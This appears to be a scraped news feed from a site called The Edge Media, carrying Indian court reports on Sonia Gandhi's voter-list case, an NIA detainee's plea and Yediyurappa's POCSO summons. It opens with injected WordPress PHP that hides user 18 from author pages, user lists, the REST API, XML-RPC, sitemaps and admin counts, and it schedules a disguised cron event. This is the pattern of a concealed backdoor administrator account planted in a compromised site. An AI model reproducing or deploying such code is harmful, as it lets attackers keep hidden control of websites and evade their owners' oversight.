add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Delhi Court Seeks Responses from Sonia Gandhi and Police on Plea Challenging Earlier Order on Citizenship-Linked Voter Entry appeared first on The Edge Media.
]]>Special Judge Vishal Gogne issued notices while hearing a revision petition that disputes the magistrate’s September 11 ruling.
The earlier order had rejected the complaint, stating that the allegations appeared crafted to confer legal authority on the court despite lacking merit, substance, or jurisdictional validity.
The judge has scheduled the case for further hearing on January 6.
The revision plea was submitted by advocate Vikas Tripathi, who serves as vice president of the Central Delhi Court Bar Association at Rouse Avenue courts.
Representing Tripathi, senior advocate Pavan Narang told the magisterial court that Sonia Gandhi’s name was allegedly added to the New Delhi constituency voter list in January 1980, a period during which she had not yet become an Indian citizen.
The petitioner further alleged that the entry involved falsification of records and resulted in deception of a public authority.
However, the magistrate dismissed the original plea seeking an investigation, concluding that the complainant was attempting to trigger criminal proceedings by urging the court to assume a jurisdiction it did not legally possess.
The post Delhi Court Seeks Responses from Sonia Gandhi and Police on Plea Challenging Earlier Order on Citizenship-Linked Voter Entry appeared first on The Edge Media.
]]>The post Delhi High Court Declines to Issue Order on Plea for Lawyer Meeting appeared first on The Edge Media.
]]>
Justice Swarana Kanta Sharma observed that Wani was unable to present any official decision from the trial court showing that his request for a meeting had been denied.
The court stated that the accused is not an exceptional case and that all applicants are required to follow the established legal process.
This observation came after Wani’s lawyer argued that the trial court had turned down the request verbally.
Wani was arrested by the NIA on November 17 as an alleged active collaborator of suicide bomber Umar Un Nabi in the November 10 Red Fort car explosion which resulted in the loss of fifteen lives.
He was placed in NIA custody for ten days following an order by the trial court on November 18.
The post Delhi High Court Declines to Issue Order on Plea for Lawyer Meeting appeared first on The Edge Media.
]]>The post Court Summons Former Karnataka Chief Minister in POCSO Case appeared first on The Edge Media.
]]>This development follows the recent decision of the Karnataka High Court, allowing the trial to move forward
On November 13, the High Court declined to quash the POCSO case filed against Yediyurappa and the three co accused.
The court dismissed the petitions filed by Yediyurappa, Aruna YM, Rudresha Marulasiddaiah and Mariswamy G, who had challenged the trial court’s decision to take cognizance of offences under the POCSO Act and relevant sections of the Indian Penal Code, as well as the issuance of summons.
However, the High Court clarified that Yediyurappa’s personal appearance should not be required unless necessary during the trial, adding that any request for exemption should be considered unless his presence becomes essential. The court also noted that Yediyurappa may seek discharge before the trial court.
The case originates from a complaint filed in March 2024, by the mother of a 17 year old girl, who alleged that the former chief minister assaulted her daughter at his residence in Dollars Colony in February, when she had gone there seeking assistance.
The post Court Summons Former Karnataka Chief Minister in POCSO Case appeared first on The Edge Media.
]]>